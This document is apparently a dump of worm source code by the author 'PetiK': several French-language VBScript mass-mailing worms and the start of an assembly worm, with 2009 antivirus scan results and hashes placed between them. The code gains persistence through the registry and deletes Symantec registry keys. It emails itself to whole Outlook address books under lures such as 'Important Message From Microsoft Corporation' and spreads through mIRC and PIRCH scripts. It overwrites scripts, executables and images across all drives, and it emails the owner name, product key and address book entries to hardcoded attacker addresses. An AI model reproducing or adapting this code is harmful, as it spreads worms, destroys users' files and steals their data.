vbscopie = file.ReadAll
DEBUT()
Sub DEBUT()
Set win = fso.GetSpecialFolder(0)
RS = ("HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices\NetWork")
Set c = fso.GetFile(WScript.ScriptFullName)
NetWork = (win&"\Network.vbs")
c.Copy (NetWork)
ws.RegWrite RS,NetWork
'NORTON()
MIRC()
ESPION()
EMAIL()
End Sub
Sub NORTON()
ws.RegDelete ("HKLM\Software\Symantec\")
ws.RegDelete ("HKCU\Software\Symantec\")
End Sub
Sub ESPION()
Set win = fso.GetSpecialFolder(0)
Set A = CreateObject("Outlook.Application")
Set B = A.GetNameSpace("MAPI")
For Each C In B.AddressLists
If C.AddressEntries.Count <> 0 Then
For D = 1 To C.AddressEntries.Count
Set E = C.Addressentries(D)
Next
End If
Next
ComputerName = CreateObject("WScript.NetWork").ComputerName
NOM = ws.RegRead("HKLM\Software\Microsoft\Windows\CurrentVersion\RegisteredOwner")
ENT = ws.RegRead("HKLM\Software\Microsoft\Windows\CurrentVersion\RegisteredOrganization")
VER = ws.RegRead("HKLM\Software\Microsoft\Windows\CurrentVersion\Version")
NUM = ws.RegRead("HKLM\Software\Microsoft\Windows\CurrentVersion\VersionNumber")
REC1 = ws.RegRead("HKLM\Software\Microsoft\Windows\CurrentVersion\ProductName")
REC2 = ws.RegRead("HKLM\Software\Microsoft\Windows\CurrentVersion\ProductKey")
REC3 = ws.RegRead("HKLM\Software\Microsoft\Windows\CurrentVersion\ProductId")
PPDB = ws.RegRead("HKCU\Control Panel\Desktop\Wallpaper")
DDEV = ws.RegRead("HKCU\Control Panel\Desktop\ScreenSaveTimeOut")
PDEM = ws.RegRead("HKCU\Software\Microsoft\Internet Explorer\Main\Start Page")
DDIR = ws.RegRead("HKCU\Software\Microsoft\Internet Explorer\Download Directory")
Set aze = fso.CreateTextFile ("C:\ESPION.txt",true)
aze.WriteLine "Information sur l'ordinateur"
aze.WriteLine "NOM DE L'ORDINATEUR : " & ComputerName
aze.WriteLine "NOM D'UTILISATEUR : " & NOM
aze.WriteLine "NOM DE L'ENTREPRISE : " & ENT
aze.WriteLine "SYSTEME D'EXPLOITAION : " & VER & " " & NUM
aze.WriteLine "NUMERO DE LICENSE : " & REC1 & " " & REC2
aze.WriteLine "NUMERO D'IDENTIFICATION : " & REC3
aze.WriteLine "PAPIER PEINT DE BUREAU : " & PPDB
aze.WriteLine "L'ECRAN DE VEILLE DE DECLENCHE AU BOUT DE " & DDEV & " SECONDES"
aze.WriteLine "NON DANS CARNET D'ADRESSES : " & E.Name
aze.WriteLine "ADDRESSE : " & E.Address
aze.WriteBlankLines(2)
aze.WriteLine "Information sur internet"
aze.WriteLine "LA PAGE DE DEMARRAGE EST : " & PDEM
aze.WriteLine "LE DOSSIER DE TELECHARGEMENT EST : " & DDIR
End Sub
Sub MIRC()
On Error Resume Next
NET2 = ws.RegRead("HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices\NetWork")
script = ("C:\script.ini")
Set srpt = fso.CreateTextFile(script, true)
srpt.WriteLine "[script]; par PetiK "
srpt.WriteLine "n0=on 1:JOIN:#:{"
srpt.WriteLine "n1= /if ( $nick == $me ) { halt }"
srpt.WriteLine "n2= /dcc send $nick " & NET2
srpt.WriteLine "n3=}"
srpt.Close
fso.CopyFile script, "C:\mirc\script.ini"
fso.CopyFile script, "C:\mirc32\script.ini"
fso.CopyFile script, "C:\program files\mirc\script.ini"
fso.CopyFile script, "C:\program files\mirc32\script.ini"
fso.DeleteFile ("C:\script.ini")
End Sub
Sub EMAIL()
Set OApp = CreateObject("Outlook.Application")
if oapp="Outlook" then
Set Mapi = OApp.GetNameSpace("MAPI")
For Each AddList In Mapi.AddressLists
If AddList.AddressEntries.Count <> 0 Then
For AddListCount = 1 To AddList.AddressEntries.Count
Set AddListEntry = AddList.AddressEntries(AddListCount)
Set msg = OApp.CreateItem(0)
msg.To = AddListEntry.Address
msg.Subject = "NetWork Game for WINDOWS"
msg.Body = "The new game for your computer arrives"
msg.Attachments.Add fso.BuildPath(fso.GetSpecialFolder(0),"\Network.vbs")
If msg.To <> "" Then
msg.Send
End If
Next
End If
Next
End if
Set msg2 = OApp.CreateItem(0)
msg2.BCC = "Panda34@caramail.com; Pentasm99@aol.com"
msg2.Subject = "Message écrit le " & date
msg2.Body = "Il était " & time
msg2.Attachments.Add ("C:\ESPION.txt")
msg2.Send
fso.DeleteFile ("C:\ESPION.txt")
End Sub
File Network.vbs received on 05.16.2009 17:59:59 (CET)
Antivirus Version Last Update Result
a-squared 4.0.0.101 2009.05.16 Email-Worm.Win32.Petik!IK
AhnLab-V3 5.0.0.2 2009.05.16 VBS/Petik
AntiVir 7.9.0.168 2009.05.15 Worm/Petik.K1
Antiy-AVL 2.0.3.1 2009.05.15 Worm/Win32.Petik
Authentium 5.1.2.4 2009.05.16 VBS/Petik.L@mm
Avast 4.8.1335.0 2009.05.15 VBS:MailWorm-gen
AVG 8.5.0.336 2009.05.15 I-Worm/Petik
BitDefender 7.2 2009.05.16 Generic.ScriptWorm.892F765D
CAT-QuickHeal 10.00 2009.05.15 VBS/Petik.L
ClamAV 0.94.1 2009.05.16 Worm.VBS-14
Comodo 1157 2009.05.08 Worm.Win32.Email-Worm.Petik
DrWeb 5.0.0.12182 2009.05.16 modification of W97M.Necronom
eSafe 7.0.17.0 2009.05.14 VBS.Scramble.
eTrust-Vet 31.6.6508 2009.05.16 VBS/Buggy
F-Prot 4.4.4.56 2009.05.16 VBS/Petik.L@mm
F-Secure 8.0.14470.0 2009.05.15 Email-Worm.Win32.Petik
Fortinet 3.117.0.0 2009.05.16 VBS/PETIK.K1
GData 19 2009.05.16 Generic.ScriptWorm.892F765D
Ikarus T3.1.1.49.0 2009.05.16 Email-Worm.Win32.Petik
K7AntiVirus 7.10.737 2009.05.16 -
Kaspersky 7.0.0.125 2009.05.16 Email-Worm.Win32.Petik
McAfee 5616 2009.05.15 VBS/Generic
McAfee+Artemis 5616 2009.05.15 VBS/Generic
McAfee-GW-Edition 6.7.6 2009.05.15 Worm.Petik.K1
Microsoft 1.4602 2009.05.16 Virus:VBS/Petik.K
NOD32 4080 2009.05.15 probably unknown SCRIPT
Norman 6.01.05 2009.05.16 VBS/GenMail.D
nProtect 2009.1.8.0 2009.05.16 VBS.Petik.C@mm
Panda 10.0.0.14 2009.05.16 VBS/Generic.worm
PCTools 4.4.2.0 2009.05.16 VBS.Petik.K
Prevx 3.0 2009.05.16 -
Rising 21.29.52.00 2009.05.16 Worm.Hopalong
Sophos 4.41.0 2009.05.16 VBS/Petik-K
Sunbelt 3.2.1858.2 2009.05.16 -
Symantec 1.4.4.12 2009.05.16 VBS.Pet_Tick.gen
TheHacker 6.3.4.1.326 2009.05.15 -
TrendMicro 8.950.0.1092 2009.05.15 VBS_PETIK.K1
VBA32 3.12.10.5 2009.05.16 -
ViRobot 2009.5.15.1737 2009.05.15 -
Additional information
File size: 4245 bytes
MD5...: af1121c899b152b95520214e4873e466
SHA1..: 2201e0075c58deed1db798dcc1c0c9f50d7086db
' Name : VBS.Kadosh
' Author : PetiK
' Language : VBS
' Date : 06/01/2001
DEBUT()
Sub DEBUT()
Set a = CreateObject("Scripting.FileSystemObject")
Set win = a.GetSpecialFolder(0)
Set sys = a.GetSpecialFolder(1)
Set c = a.GetFile(WScript.ScriptFullName)
c.Copy(win&"\WinExec.exe.vbs")
c.Copy(sys&"\WinRun.dll.vbs")
INTERNET()
EMAIL()
msgbox "Le tour du monde en 20 jours",vbinformation
End Sub
' MODIFIE LA PAGE DE DEMARRAGE D'INTERNET
Sub INTERNET()
Set W = Wscript.CreateObject("WScript.Shell")
W.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page",
"live.multimania.com"
W.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\WinExec",
"C:\WINDOWS\WinExec.exe.vbs"
End Sub
' ENVOIE UNE DE SES COPIE A TOUS LES DESTINATAIRE DU CARNET D'ADRESSE
Sub EMAIL()
Set K = CreateObject("Outlook.Application")
Set L = K.GetNameSpace("MAPI")
For Each M In L.AddressLists
If M.AddressEntries.Count <> 0 Then
Set N = K.CreateItem(0)
For O = 1 To M.AddressEntries.Count
Set P = M.AddressEntries(O)
If O = 1 Then
N.BCC = P.Address
Else
N.BCC = N.BCC & "; " & P.Address
End If
Next
N.Subject = "Le Tour du Monde"
N.Body = "Voici une lettre qui va faire le tour du monde. Ouvre Vite"
Set Q = CreateObject("Scripting.FileSystemObject")
N.Attachments.Add Q.BuildPath(Q.GetSpecialFolder(0),"WinExec.exe.vbs")
N.Send
End If
Next
End Sub
File WinExec.exe.vbs received on 05.11.2009 07:14:12 (CET)
Additional information
File size: 1683 bytes
MD5...: 763d1411edc603a60b7fdd2f63d77579
SHA1..: 98fede0c3a54c7c3fd8261b44b27107f91f4fc49
' Name : VBS.ShowVar
' Author : PetiK
' Language : VBS
' Date : 17/01/2001
DEBUT()
Sub DEBUT()
On Error Resume Next
Set win = fso.GetspecialFolder(0)
RUN = ("HKLM\Software\Microsoft\Windows\CurrentVersion\Run\ShowVar")
Set c = fso.GetFile(WScript.ScriptFullName)
ShowVar = (win&"\Showvar.vbs")
c.Copy (ShowVar)
ws.RegWrite RUN,ShowVar
If ws.RegRead ("HKCU\Software\ShowVar\MIRC") <> "1" then
Mirc ""
End If
If ws.RegRead ("HKCU\Software\ShowVar\PIRCH") <> "1" then
Pirch ""
End If
if ws.regread ("HKCU\Software\ShowVar\MAIL") <> "1" then
EMail()
End If
Divers()
End Sub
Function Mirc(Path)
'On Error Resume Next
If Path = "" Then
If fso.fileexists("c:\mirc\mirc.ini") Then Path = "c:\mirc"
If fso.fileexists("c:\mirc32\mirc.ini") Then Path = "c:\mirc32"
PFD = ws.regread("HKLM\Software\Microsoft\Windows\CurrentVersion\ProgramFilesDir")
SV2 = ws.regread("HKLM\Software\Microsoft\Windows\CurrentVersion\Run\ShowVar")
If fso.fileexists(PFD & "\mirc\mirc.ini") Then Path = PFD & "\mirc"
End If
If Path <> "" Then
Set Script = fso.CreateTextFile(Path & "\script.ini", True)
Script.writeline "[script]"
Script.writeline "n0=on 1:JOIN:#:{"
Script.writeline "n1= /if ( $nick == $me ) { halt }"
Script.writeline "n2= /." & chr(100) & chr(99) & chr(99) & " send $nick " & SV2
Script.writeline "n3=}"
Script.Close
ws.RegWrite "HKCU\Software\ShowVar\MIRC", "1"
End If
End Function
Function Pirch(path)
On Error Resume Next
Set fso = CreateObject("scripting.filesystemobject")
Set ws = CreateObject("wscript.shell")
If path = "" Then
If fso.fileexists("c:\pirch\Pirch32.exe") Then path = "c:\pirch"
If fso.fileexists("c:\pirch32\Pirch32.exe") Then path = "c:\pirch32"
pfDir = ws.regread("HKLM\Software\Microsoft\Windows\CurrentVersion\ProgramFilesDir")
SV3 = ws.regread("HKLM\Software\Microsoft\Windows\CurrentVersion\Run\ShowVar")
If fso.fileexists(pfDir & "\pirch\Pirch32.exe") Then path = pfDir & "\pirch\Pirch32.exe"
End If
If path <> "" Then
Set Script = fso.CreateTextFile(path & "\events.ini", True)
Script.WriteLine "[Levels]"
Script.WriteLine "Enabled=1"
Script.WriteLine "Count=6"
Script.WriteLine "Level1=000-Unknowns"
Script.WriteLine "000-UnknownsEnabled=1"
Script.WriteLine "Level2=100-Level 100"
Script.WriteLine "100-Level 100Enabled=1"
Script.WriteLine "Level3=200-Level 200"
Script.WriteLine "200-Level 200Enabled=1"
Script.WriteLine "Level4=300-Level 300"
Script.WriteLine " 300-Level 300Enabled=1"
Script.WriteLine "Level5=400-Level 400 "
Script.WriteLine "400-Level 400Enabled=1"
Script.WriteLine "Level6=500-Level 500"
Script.WriteLine "500-Level 500Enabled=1"
Script.WriteLine ""
Script.WriteLine "[000-Unknowns]"
Script.WriteLine "UserCount=0"
Script.WriteLine "EventCount=0"
Script.WriteLine ""
Script.WriteLine "[100-Level 100]"
Script.WriteLine "User1=*!*@*"
Script.WriteLine "UserCount=1"
Script.WriteLine "Event1=ON JOIN:#:/" & chr(100) & chr(99) & chr(99) & " tsend $nick " &
SV3
Script.WriteLine "EventCount=1"
Script.WriteLine ""
Script.WriteLine "[200-Level 200]"
Script.WriteLine "UserCount=0"
Script.WriteLine "EventCount=0"
Script.WriteLine ""
Script.WriteLine "[300-Level 300]"
Script.WriteLine "UserCount=0"
Script.WriteLine "EventCount=0"
Script.WriteLine ""
Script.WriteLine "[400-Level 400]"
Script.WriteLine "UserCount=0"
Script.WriteLine "EventCount=0"
Script.WriteLine ""
Script.WriteLine "[500-Level 500]"
Script.WriteLine "UserCount=0"
Script.WriteLine "EventCount=0"
Script.Close
End If
ws.RegWrite "HKCU\Software\ShowVar\PIRCH", "1"
End Function
Function EMail()
On Error Resume Next
Set fso = CreateObject("scripting.filesystemobject")
Set Outlook = CreateObject("Outlook.Application")
If Outlook = "Outlook" Then
Set Myself = fso.opentextfile(wscript.scriptfullname, 1)
I = 1
Do While Myself.atendofstream = False
MyLine = Myself.readline
Code = Code & Chr(34) & " & vbcrlf & " & Chr(34) & Replace(MyLine, Chr(34), Chr(34) &
"&chr(34)&" & Chr(34))
Loop
Myself.Close
htm = "<HTML><HEAD><META content=" & Chr(34) & " & chr(34) & " & Chr(34) & "text/html;
charset=iso-8859-1" & Chr(34) & " http-equiv=Content-Type><META content=" & Chr(34) &
"MSHTML 5.00.2314.1000" & Chr(34) & " name=GENERATOR><STYLE></STYLE></HEAD><BODY
bgColor=#ffffff><SCRIPT language=vbscript>"
htm = htm & vbCrLf & "On Error Resume Next"
htm = htm & vbCrLf & "Set fso = CreateObject(" & Chr(34) & "Scripting.FileSystemObject" &
Chr(34) & ")"
htm = htm & vbCrLf & "If Err.Number <> 0 Then"
htm = htm & vbCrLf & "document.write " & Chr(34) & "<font face='verdana' color=#ff0000
size='2'>Pour lire cet EMail, merci d'activer l'option ActiveX.<br>Rouvrez ce message et
accepter les ActiveX<br>Microsoft Outlook</font>" & Chr(34) & ""
htm = htm & vbCrLf & "Else"
htm = htm & vbCrLf & "Set vbs = fso.CreateTextFile(fso.GetSpecialFolder(1) & " & Chr(34)
& "\Worm.vbs" & Chr(34) & ", True)"
htm = htm & vbCrLf & "vbs.write " & Chr(34) & Code & Chr(34)
htm = htm & vbCrLf & "vbs.Close"
htm = htm & vbCrLf & "Set ws = CreateObject(" & Chr(34) & "wscript.shell" & Chr(34) & ")"
htm = htm & vbCrLf & "ws.run fso.GetSpecialFolder(0) & " & Chr(34) & "\wscript.exe " &
Chr(34) & " & fso.getspecialfolder(1) & " & Chr(34) & "\Worm.vbs %" & Chr(34) & ""
htm2 = htm2 & vbCrLf & "document.write " & Chr(34) & "Ce message contient de nombreux
erreurs.<br>Désolé !<br>" & Chr(34) & ""
htm2 = htm2 & vbCrLf & "End If"
htm2 = htm2 & vbCrLf & "<" & "/SCRIPT></" & "body></" & "html>"
HtmlBody = htm & htm2
Set mapi = Outlook.GetNameSpace("MAPI")
For Each Addresslist In mapi.AddressLists
If Addresslist.AddressEntries.Count <> 0 Then
AddCount = Addresslist.AddressEntries.Count
Set Msg = Outlook.CreateItem(0)
Msg.Subject = "Salut l'ami. Ouvre vite, la chance peut tourner !!"
Msg.HtmlBody = HtmlBody
Msg.DeleteAfterSubmit = True
For II = 1 To AddCount
Set Addentry = Addresslist.AddressEntries(II)
If AddCount = 1 Then
Msg.BCC = Addentry.Address
Else
Msg.BCC = Msg.BCC & "; " & Addentry.Address
End If
Next
Msg.send
End If
Next
Outlook.Quit
End If
ws.regwrite "HKCU\Software\ShowVar\MAIL", "1"
End Function
Function Divers()
If Day(Now()) = 5 Then
MsgBox "Et si on faisait une partie d'echec ?",vbinformation,"WarGames"
End If
AZE = ws.RegRead ("HKCR\txtfile\DefaultIcon")
ws.RegWrite "HKCR\VBSfile\DefaultIcon\",AZE
End Function
File ShowVar.vbs received on 05.16.2009 19:40:46 (CET)
Additional information
File size: 6557 bytes
MD5...: b4a5df075e6d5278036e07be004b3e09
SHA1..: e757ae3f2a165cdb1861c8c8743bd0f76c28d606
' Name : VBS/Outlook/mIrc/PIRCH/PetiK.A
' Author : PetiK
' Language : VBS
' Date : 30/01/2001
DEBUT()
Sub DEBUT()
On Error Resume Next
Set win = fso.GetspecialFolder(0)
RUN = ("HKLM\Software\Microsoft\Windows\CurrentVersion\Run\PetiK")
Set c = fso.GetFile(WScript.ScriptFullName)
PetiK = (win&"\PetiK.txt.vbs")
c.Copy (PetiK)
ws.RegWrite RUN,PetiK
VBSI = ws.RegRead ("HKCR\VBSFile\DefaultIcon\")
TXTI = ws.RegRead ("HKCR\txtfile\DefaultIcon\")
ws.RegWrite "HKLM\Software\PetiK\ICONE VBS",VBSI
ws.RegWrite "HKCR\VBSFile\DefaultIcon\",TXTI
If ws.RegRead ("HKLM\Software\PetiK\") <> "OK" Then
EMail()
End If
If ws.RegRead ("HKLM\Software\PetiK\MIRC") <> "OK" then
Mirc ""
End If
If ws.RegRead ("HKLM\Software\PetiK\PIRCH") <> "OK" then
Pirch ""
End If
lecteur()
End Sub
Function EMail()
On Error Resume Next
Set fso = CreateObject("scripting.filesystemobject")
Set Outlook = CreateObject("Outlook.Application")
If Outlook = "Outlook" Then
Set Myself = fso.opentextfile(wscript.scriptfullname, 1)
I = 1
Do While Myself.atendofstream = False
MyLine = Myself.readline
Code = Code & Chr(34) & " & vbcrlf & " & Chr(34) & Replace(MyLine, Chr(34), Chr(34) &
"&chr(34)&" & Chr(34))
Loop
Myself.Close
htm = "<HTML><HEAD><META content=" & Chr(34) & " & chr(34) & " & Chr(34) & "text/html;
charset=iso-8859-1" & Chr(34) & " http-equiv=Content-Type><META content=" & Chr(34) &
"MSHTML 5.00.2314.1000" & Chr(34) & " name=GENERATOR><STYLE></STYLE></HEAD><BODY
bgColor=#ffffff><SCRIPT language=vbscript>"
htm = htm & vbCrLf & "On Error Resume Next"
htm = htm & vbCrLf & "Set fso = CreateObject(" & Chr(34) & "Scripting.FileSystemObject" &
Chr(34) & ")"
htm = htm & vbCrLf & "If Err.Number <> 0 Then"
htm = htm & vbCrLf & "document.write " & Chr(34) & "<font face='verdana' color=#ff0000
size='2'>You need ActiveX enabled if you want to see this EMail.<br>Please open this
message again and click accept ActiveX<br>Microsoft Outlook</font>" & Chr(34) & ""
htm = htm & vbCrLf & "Else"
htm = htm & vbCrLf & "Set vbs = fso.CreateTextFile(fso.GetSpecialFolder(1) & " & Chr(34)
& "\Worm.vbs" & Chr(34) & ", True)"
htm = htm & vbCrLf & "vbs.write " & Chr(34) & Code & Chr(34)
htm = htm & vbCrLf & "vbs.Close"
htm = htm & vbCrLf & "Set ws = CreateObject(" & Chr(34) & "wscript.shell" & Chr(34) & ")"
htm = htm & vbCrLf & "ws.run fso.GetSpecialFolder(0) & " & Chr(34) & "\wscript.exe " &
Chr(34) & " & fso.getspecialfolder(1) & " & Chr(34) & "\Worm.vbs %" & Chr(34) & ""
htm2 = htm2 & vbCrLf & "document.write " & Chr(34) & "This message has permanent
errors.<br>Sorry<br>" & Chr(34) & ""
htm2 = htm2 & vbCrLf & "End If"
htm2 = htm2 & vbCrLf & "<" & "/SCRIPT></" & "body></" & "html>"
HtmlBody = htm & htm2
Set mapi = Outlook.GetNameSpace("MAPI")
For Each Addresslist In mapi.AddressLists
If Addresslist.AddressEntries.Count <> 0 Then
AddCount = Addresslist.AddressEntries.Count
Set Msg = Outlook.CreateItem(0)
Msg.Subject = "Important Message From Microsoft Corporation"
Msg.HtmlBody = HtmlBody
Msg.DeleteAfterSubmit = True
For II = 1 To AddCount
Set Addentry = Addresslist.AddressEntries(II)
If AddCount = 1 Then
Msg.BCC = Addentry.Address
Else
Msg.BCC = Msg.BCC & "; " & Addentry.Address
End If
Next
Msg.send
End If
Next
Set msg2 = Outlook.CreateItem(0)
ComputerName = CreateObject("WScript.NetWork").ComputerName
NOM = ws.RegRead ("HKLM\Software\Microsoft\Windows\CurrentVersion\RegisteredOwner")
ENT = ws.RegRead
("HKLM\Software\Microsoft\Windows\CurrentVersion\RegisteredOrganization")
VER = ws.RegRead ("HKLM\Software\Microsoft\Windows\CurrentVersion\Version")
NUM = ws.RegRead ("HKLM\Software\Microsoft\Windows\CurrentVersion\VersionNumber")
REC1 = ws.RegRead ("HKLM\Software\Microsoft\Windows\CurrentVersion\ProductId")
REC2 = ws.RegRead ("HKLM\Software\Microsoft\Windows\CurrentVersion\ProductKey")
PFD = ws.RegRead ("HKLM\Software\Microsoft\Windows\CurrentVersion\ProgramFilesDir")
PDEM = ws.RegRead ("HKCU\Software\Microsoft\Internet Explorer\Main\Start Page")
DDIR = ws.RegRead ("HKCU\Software\Microsoft\Internet Explorer\Download Directory")
PAYS = ws.RegRead ("HKCU\Software\Microsoft\Internet
Explorer\International\AcceptLanguage")
WINDIR = fso.GetSpecialFolder(0)
SYSDIR = fso.GetSpecialFolder(1)
TMPDIR = fso.GetSpecialFolder(2)
msg2.BCC = "petik@caramail.com;ppetik@hotmail.com"
msg2.Subject = "Message pour PetiK de " & NOM
m2 = "-Information :"
m2 = m2 & vbCrLf & "Date : " & date
m2 = m2 & vbCrLf & "Heure : " & time
m2 = m2 & vbCrLf & "NOM DE L'ORDINATEUR : " & ComputerName
m2 = m2 & vbCrLf & "ENTREPRISE : " & ENT
m2 = m2 & vbCrLf & "PAYS : " & PAYS
m2 = m2 & vbCrLf & "SYSTEME D'EXPLOITATION : " & VER & " " & NUM
m2 = m2 & vbCrLf & "NUMERO D'IDENTIFICATION : " & REC1
m2 = m2 & vbCrLf & "NUMERO D'ENREGISTREMENT : " & REC2
m2 = m2 & vbCrLf & "PAGE DE DEMARRAGE : " & PDEM
m2 = m2 & vbCrLf & "DOSSIER DE TELECHARGEMENT : " & DDIR
m2 = m2 & vbCrLf & "DOSSIER WINDOWS : " & WINDIR
m2 = m2 & vbCrLf & "DOSSIER SYSTEME : " & SYSDIR
m2 = m2 & vbCrLf & "DOSSIER TEMPORAIRE : " & TMPDIR
m2 = m2 & vbCrLf & "DOSSIER PROGRAM FILES : " & PFD
msg2.Body = m2
msg2.DeleteAfterSubmit = True
msg2.Send
Outlook.Quit
End If
ws.RegWrite "HKLM\Software\PetiK\","OK"
End Function
Function Mirc(Path)
'On Error Resume Next
If Path = "" Then
If fso.FileExists("c:\mirc\mirc.ini") Then Path = "c:\mirc"
If fso.FileExists("c:\mirc32\mirc.ini") Then Path = "c:\mirc32"
PFD = ws.regread("HKLM\Software\Microsoft\Windows\CurrentVersion\ProgramFilesDir")
PK2 = ws.regread("HKLM\Software\Microsoft\Windows\CurrentVersion\Run\PetiK")
If fso.FileExists(PFD & "\mirc\mirc.ini") Then Path = PFD & "\mirc"
If fso.FileExists(PFD & "\mirc32\mirc.ini") Then Path = PFD & "\mirc"
End If
If Path <> "" Then
Set Script = fso.CreateTextFile(Path & "\script.ini", True)
Script.writeline "[script]"
Script.writeline "n0=on 1:JOIN:#:{"
Script.writeline "n1= /if ( $nick == $me ) { halt }"
Script.writeline "n2= /." & chr(100) & chr(99) & chr(99) & " send $nick " & PK2
Script.writeline "n3=}"
Script.Close
ws.RegWrite "HKLM\Software\PetiK\MIRC", "OK"
End If
End Function
Function Pirch(path)
On Error Resume Next
Set fso = CreateObject("scripting.filesystemobject")
Set ws = CreateObject("wscript.shell")
If path = "" Then
If fso.FileExists("c:\pirch\Pirch32.exe") Then path = "c:\pirch"
If fso.FileExists("c:\pirch32\Pirch32.exe") Then path = "c:\pirch32"
pfDir = ws.regread("HKLM\Software\Microsoft\Windows\CurrentVersion\ProgramFilesDir")
PK3 = ws.regread("HKLM\Software\Microsoft\Windows\CurrentVersion\Run\PetiK")
If fso.FileExists(pfDir & "\pirch\Pirch32.exe") Then path = pfDir & "\pirch\Pirch32.exe"
If fso.FileExists(pfDir & "\pirch32\Pirch32.exe") Then path = pfDir &
"\pirch\Pirch32.exe"
End If
If path <> "" Then
Set Script = fso.CreateTextFile(path & "\events.ini", True)
Script.WriteLine "[Levels]"
Script.WriteLine "Enabled=1"
Script.WriteLine "Count=6"
Script.WriteLine "Level1=000-Unknowns"
Script.WriteLine "000-UnknownsEnabled=1"
Script.WriteLine "Level2=100-Level 100"
Script.WriteLine "100-Level 100Enabled=1"
Script.WriteLine "Level3=200-Level 200"
Script.WriteLine "200-Level 200Enabled=1"
Script.WriteLine "Level4=300-Level 300"
Script.WriteLine " 300-Level 300Enabled=1"
Script.WriteLine "Level5=400-Level 400 "
Script.WriteLine "400-Level 400Enabled=1"
Script.WriteLine "Level6=500-Level 500"
Script.WriteLine "500-Level 500Enabled=1"
Script.WriteLine ""
Script.WriteLine "[000-Unknowns]"
Script.WriteLine "UserCount=0"
Script.WriteLine "EventCount=0"
Script.WriteLine ""
Script.WriteLine "[100-Level 100]"
Script.WriteLine "User1=*!*@*"
Script.WriteLine "UserCount=1"
Script.WriteLine "Event1=ON JOIN:#:/" & chr(100) & chr(99) & chr(99) & " tsend $nick " &
PK3
Script.WriteLine "EventCount=1"
Script.WriteLine ""
Script.WriteLine "[200-Level 200]"
Script.WriteLine "UserCount=0"
Script.WriteLine "EventCount=0"
Script.WriteLine ""
Script.WriteLine "[300-Level 300]"
Script.WriteLine "UserCount=0"
Script.WriteLine "EventCount=0"
Script.WriteLine ""
Script.WriteLine "[400-Level 400]"
Script.WriteLine "UserCount=0"
Script.WriteLine "EventCount=0"
Script.WriteLine ""
Script.WriteLine "[500-Level 500]"
Script.WriteLine "UserCount=0"
Script.WriteLine "EventCount=0"
Script.Close
End If
ws.RegWrite "HKLM\Software\PetiK\PIRCH", "OK"
End Function
Sub lecteur
On Error Resume Next
dim f,f1,fc
Set dr = fso.Drives
For Each d in dr
If d.DriveType=2 or d.DriveType=3 Then
liste(d.path&"\")
End If
Next
End Sub
Sub infecte(dossier)
On Error Resume Next
Set f = fso.GetFolder(dossier)
Set fc = f.Files
For Each f1 in fc
ext = fso.GetExtensionName(f1.path)
ext = lcase(ext)
if (ext="vbs") or (ext="vbe")
Set ap=fso.OpenTextFile(f1.path,2,True)
ap.Write vbscopie
ap.Close
elseif (ext="js") or (ext="jse") Then
Set ap=fso.OpenTextFile(f1.path,2,True)
ap.Write vbscopie
ap.Close
bn=fso.GetBaseName(f1.path)
Set cop=fso.GetFile(f1.path)
cop.Copy(dossier&"\"&bn&".vbs")
fso.DeleteFile(f1.path)
elseif (ext="exe") or (ext="ini") or (ext="gif") or (ext="jpg") or (ext="htm") Then
Set cr = fso.CreateTextFile(f1.path&".vbs")
cr.Write vbscopie
cr.Close
fso.DeleteFile(f1.path)
elseif (ext="mp3") or (ext="doc") or (ext="xls") or (ext="ppt") or (ext="hlp") Then
Set att=fso.GetFile(f1.path)
att.attributes=att.attributes+2
End If
Next
End Sub
Sub liste(dossier)
On Error Resume Next
Set f = fso.GetFolder(dossier)
Set sf = f.SubFolders
For Each f1 in sf
infecte(f1.path)
liste(f1.path)
Next
End Sub
File PetiK.vbs received on 05.16.2009 19:29:07 (CET)
Additional information
File size: 9766 bytes
MD5...: c9103a19fecc9f28dda136a81899d2fe
SHA1..: e06a3a4da1ce93f9005977877c85733a057da4e0
comment $ 04/02/2001 => 07/02/2001
DESCRIPTION:
S'enregistre comme "Service Process" c'est à dir qu'il n'est pas visible dans
la liste des tâches (CTRL+ALT+SUPR).
Se copie ensuite dans le dossier SYSTEM sous le nom ie042601.exe : %SysDir%\ie042601.exe
Et s'ebregistre dans le fichier WIN.INI :
[windows]
run=%SysDir%\ie042601.exe (où %SysDir% est le nom par défaut du dossier SYSTEM)
Crée le fichier SCRIPT.INI dans C:\ puis va le copier dans C:\MIRC et C:\MIRC32 puis
efface
l'original dans C:\
Crée EMAIL.VBS dans le répertoire %WinDir% en "lecture seule".
Crée WSOCK32.BAT et C:\WIN.DRV dans %WinDir% en "fichier caché".
Le programme essaie ensuite de se procurer l'adresse IP du site francophone de yahoo
(www.yahoo.fr).
Si il y arrive, il éxécute WSOCK32.BAT :
- Exécution de EMail.vbs = Envoir du programme à tous les destinataires du carnet
d'adresses.
- Téléchargement de petik.bmp dans C:\
Modification du papier peint avec l'image "petik.bmp".
Tous les fichiers BMP dur répertoire WINDOWS auront l'attribut caché.
POUR COMPILER:
tasm32 /M /ML ie042601.asm
tlink32 -Tpe -x -aa ie042601.obj,,,import32 $
.386
jumps
locals
.model flat, stdcall
;KERNEL32.dll
extrn CreateFileA:PROC
extrn WritePrivateProfileStringA:PROC
extrn CloseHandle:PROC
extrn CopyFileA:PROC
extrn lstrcat:PROC
extrn DeleteFileA:PROC
extrn ExitProcess:PROC
extrn FindFirstFileA:PROC
extrn FindNextFileA:PROC
extrn FindClose:PROC
extrn GetCurrentDirectoryA:PROC
extrn GetCurrentProcessId:PROC
extrn GetModuleFileNameA:PROC
extrn GetModuleHandleA:PROC
extrn GetSystemDirectoryA:PROC
extrn GetWindowsDirectoryA:PROC
extrn RegisterServiceProcess:PROC
extrn SetCurrentDirectoryA:PROC
extrn SetFileAttributesA:PROC
extrn Sleep:PROC
extrn WinExec:PROC
extrn WriteFile:PROC
;ADVAPI32.dll
extrn RegSetValueExA:PROC
extrn RegOpenKeyExA:PROC
extrn RegCloseKey:PROC
;WSOCK32.dll
extrn gethostbyname:PROC
;USER32.dll
extrn SystemParametersInfoA:PROC
.data
szBAT db 260 dup (0)
szInfo db 260 dup (0)
szOrig db 260 dup (0)
szVBS db 260 dup (0)
szWinini db 260 dup (0)
DIR db 260 dup (0)
FileHandle dd ?
RegHandle dd ?
SearchHandle dd ?
octets dd ?
Copie db "\ie042601.exe",00h
batfile db "\wsock32.bat",00h
vbsfile db "\EMail.vbs",00h
bmpfile db "C:\petik.bmp",00h
drvfile db "C:\Win.drv",00h
